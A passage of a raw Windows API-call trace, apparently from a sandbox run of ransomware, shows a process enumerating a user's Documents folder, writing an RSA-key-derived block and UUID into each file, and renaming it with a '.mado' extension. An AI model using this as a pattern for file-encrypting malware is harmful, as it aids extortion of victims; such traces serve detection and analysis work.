hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0205.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0205.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0205.080] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0205.080] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0205.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0205.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0205.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.084] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\") returned="fZpil8Uu6QzTlWoWB\\" [0205.084] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0205.084] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.084] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.084] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.084] PathFindFileNameW (pszPath="") returned="" [0205.084] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x463890b0, ftCreationTime.dwHighDateTime=0x1d5e362, ftLastAccessTime.dwLowDateTime=0x59086520, ftLastAccessTime.dwHighDateTime=0x1d5d8aa, ftLastWriteTime.dwLowDateTime=0x59086520, ftLastWriteTime.dwHighDateTime=0x1d5d8aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0205.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.085] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x463890b0, ftCreationTime.dwHighDateTime=0x1d5e362, ftLastAccessTime.dwLowDateTime=0x59086520, ftLastAccessTime.dwHighDateTime=0x1d5d8aa, ftLastWriteTime.dwLowDateTime=0x59086520, ftLastWriteTime.dwHighDateTime=0x1d5d8aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.085] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59d79240, ftCreationTime.dwHighDateTime=0x1d5e71f, ftLastAccessTime.dwLowDateTime=0xb1a0ca90, ftLastAccessTime.dwHighDateTime=0x1d5db27, ftLastWriteTime.dwLowDateTime=0xb1a0ca90, ftLastWriteTime.dwHighDateTime=0x1d5db27, nFileSizeHigh=0x0, nFileSizeLow=0xf552, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1Cuz9kmz.rtf", cAlternateFileName="")) returned 1 [0205.085] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\1Cuz9kmz.rtf") returned=".rtf" [0205.085] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\1Cuz9kmz.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\1cuz9kmz.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.086] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=62802) returned 1 [0205.086] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.089] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xf52c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.089] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.091] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xf552, lpOverlapped=0x0) returned 1 [0205.091] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.092] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.092] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.092] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0205.092] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.092] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.092] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.093] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.093] GetLastError () returned 0x0 [0205.093] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.093] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0205.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.093] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.093] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.093] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.093] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0205.094] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xf552, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.094] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0205.094] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.094] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.094] CloseHandle (hObject=0x63c) returned 1 [0205.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef090 [0205.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74e80 [0205.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef090 | out: hHeap=0x2c0000) returned 1 [0205.095] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\1Cuz9kmz.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\1cuz9kmz.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\1Cuz9kmz.rtf.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\1cuz9kmz.rtf.mado")) returned 1 [0205.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.096] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.097] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0205.097] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9795f40, ftCreationTime.dwHighDateTime=0x1d5e1e6, ftLastAccessTime.dwLowDateTime=0x31ee9aa0, ftLastAccessTime.dwHighDateTime=0x1d5e65f, ftLastWriteTime.dwLowDateTime=0x31ee9aa0, ftLastWriteTime.dwHighDateTime=0x1d5e65f, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6CwJR4agNRfXCpY.ppt", cAlternateFileName="6CWJR4~1.PPT")) returned 1 [0205.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d6360 [0205.097] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.097] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\6CwJR4agNRfXCpY.ppt") returned=".ppt" [0205.097] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 